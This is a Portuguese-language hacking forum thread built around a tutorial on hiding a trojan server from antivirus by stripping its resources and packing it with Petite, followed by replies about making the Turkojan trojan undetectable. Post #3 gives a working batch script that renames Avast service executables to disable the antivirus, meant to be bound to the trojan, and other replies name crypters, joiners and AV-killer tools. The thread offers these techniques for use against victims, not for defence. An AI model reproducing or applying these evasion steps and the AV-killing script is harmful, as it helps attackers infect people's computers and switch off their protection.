Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Como esconder definitivamente um trojan de um anti-vírus

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Matéria Como esconder definitivamente um trojan de um anti-vírus

    Hoje as pessoas confiam demais em programas para sua segurança. Seja um firewall, um sistema de IDS ou mesmo um anti-vírus. Só que muitas vezes apenas os programas não são suficientes, pois eles também são falhos. Vamos fazer um teste com um famoso anti-vírus do mercado, o Norton 2003. Isso não vai fazer diferença pois todo anti-vírus é vulnerável a esse problema. Usarei o servidor de um cavalo de tróia(trojan) que abre e recebe conexões na porta 666 do seu computador. Poderia ser qualquer outro. O nome do arquivo servidor é server.exe . Vou passar o Norton nele para ver o que acontece.





    O Anti-Vírus encontrou o trojan. Reclamou de “infecção encontrada” e o apagou. Sorte que fiz uma cópia dele. Vamos dar uma olhada na estrutura do Server.exe . Para isso usarei o excelente PE Explorer ou Resource Explorer, ambos podem ser conseguidos em Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... . Esses softwares permitem que eu “enxergue” o que existe dentro do arquivo binário e consiga até manipular alguns dados.



    Usando o PE Explorer então, vou apagar todas as imagens existentes dentro do Server (bitmaps e cursores), todas as janelas de diálogo que ele possa ter, modificarei algumas strings e um pouco do código em Pascal (como o nome dos componentes e seu caption). Poxa consigo fazer tudo isso com esse programa? Sim, consegue. Mesmo após retirarmos todo esse “lixo”, o programa ainda roda. Está na hora do segundo tratamento dado ao Server, comprimir o seu tamanho usando o programa Petite (Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ).



    Bom, mandei comprimir o programa e ele ficou com cerca de 30 a 50% maior do que seu tamanho original. Não, essa não é uma compressão do tipo ZIP ou coisa do gênero. O Petite praticamente realoca o arquivo, tornando-o totalmente diferente do que era antes… mas ainda funcional. Salvamos o novo arquivo comprimido como servercompress.exe . Vamos repassar o Norton 2003 para vermos agora :





    Prontinho. O anti-vírus não encontrou nenhuma infecção. Isso porquê o AV procura padrões conhecidos de vírus e trojans nos arquivos. É como se ele olhasse uma foto e procurasse por ela dentro de arquivos. Como nós modificamos muito a nossa “foto” original, o programa não detectou nada. Os cavalos de tróia de hoje conseguem até barrar firewalls como Zone Alarm. Como ? Eles possui um pequeno banco de dados com o nome de processos de programas comumente usados como Zone Alarm, Norton Internet Security, Tiny Firewall, etc. Antes do trojan tentar abrir a porta e o firewall detectar, ele procura entre os processos que estão sendo executados no computador aqueles que estão na sua lista. Se encontrar algum deles, o trojan os fecha (claro que o trojan precisa ter permissão para isso, mas na maioria dos usuários comuns isso vai acontecer) e pode até substituir o ícone da barra de tarefas por um falso, exatamente igual ao do firewall que ele acabou de fechar.


    Fonte/Creditos: Invasão
    Postado Por: RedDeviL

  • Font Size
    #2
    amigo eu ja deixei meu server do turkojan indetectavel mas isso quendo vc passa um scam com o antivirus. mas assim que o server é executado o antivirus pega na hora e deleta. estou usando o avast profissional. quero ver alguem deixar o bixo indetectavel quando executado.
    quem solber desse milagre por favor compartilhe

    Comment


    • Font Size
      #3
      Adrenalina,
      te aconselho a bindar o server com um avkill, ou no caso um avastkill.
      o Codigo pro avast:
      @echo off
      CD C:\Arquivos de programas\Alwil Software\Avast4
      Ren ashwebsv.exe ashwebsv.rar
      Ren ashdisp.exe ashdisp.rar
      Ren ashmaisv.exe ashmaisv.rar
      Ren ashserv.exe ashserv.rar
      Ren ashwebsv.exe ashwebsv.rar
      Ren aswupdsv.exe aswupdsv.rar
      exit

      Salve como avkill.bat, binde e seja feliz !

      Comment


      • Font Size
        #4
        tem como so parar a protecao padrao do avast?

        Comment


        • Font Size
          #5
          O avkill serve pra " matar (parar) " a proteção do antivirus!
          blz ? flw

          Comment


          • Font Size
            #6
            Existe Av kill para o KIS 2010?

            Onde encontro isso?
            Este metodo resulta no KIS, ja alguem experimentou?


            Cumps

            Comment


            • Font Size
              #7
              Ótimo post.....

              Comment


              • Font Size
                #8
                indetectavel só o spyone mesmo
                Turkojan até da só que na hora de executar o anti virus detecta
                E esse negocio de av-kill ja era ele é detectavel e nao funciona em todos os anti-virus (Funcionava mas depois das atualizações de alguns ele ja era)

                As ruas são sarjetas dilatadas cheias de sangue e, quando os bueiros transbordarem, todos os vermes vão se afogar. A imundicie de todo o sexo e matanças vai espumar até a cintura e os políticos e as putas vão olhar para cima gritando: ‘Salvem-nos.’
                E eu vou olhar para baixo e sussurrar…
                .
                Não!

                Comment


                • Font Size
                  #9
                  Muito bom esse post

                  valeu cara !
                  A atitude traz a sorte !

                  Comment


                  • Font Size
                    #10
                    Fala ae galera,

                    Sou novo no pedaço e estou aprendendo a blindar um server do turkojan. Alguem conhece algum metodo que funcione.

                    Ja fiz teste com:

                    *Themida
                    *Cactus Joiner
                    *Fire Joiner
                    *Invasion Hacker
                    *Adendo

                    No aguardo.

                    Agradeço desde ja.

                    Abraços

                    Comment


                    • Font Size
                      #11
                      pois eh ... ta duro acha algo bom ...hehe vlwww belo post

                      Comment


                      • Font Size
                        #12
                        da hora vou tentar aqui e ver no que da isso

                        muito looko

                        Comment


                        • Font Size
                          #13
                          Num ta dificil naum galera manjo um poco sobre isso nem la muitas coisas mais sei 1 poquim
                          Procurem ai por AvFucker e Ds-plit vcs vao aprender a ranca quase todos os anti-Virus...


                          (x) Faculdade Sistema de Informação (2° Periodo)

                          Você é de Bocaiúva Mg ?? Me add ae ...

                          Comment


                          • Font Size
                            #14
                            Eeee sonho de turkojan indetect que não acaba
                            hahahha

                            As ruas são sarjetas dilatadas cheias de sangue e, quando os bueiros transbordarem, todos os vermes vão se afogar. A imundicie de todo o sexo e matanças vai espumar até a cintura e os políticos e as putas vão olhar para cima gritando: ‘Salvem-nos.’
                            E eu vou olhar para baixo e sussurrar…
                            .
                            Não!

                            Comment


                            • Font Size
                              #15
                              ....muito excelente.. topico... vlw...

                              Comment

                              X
                              Working...
                              X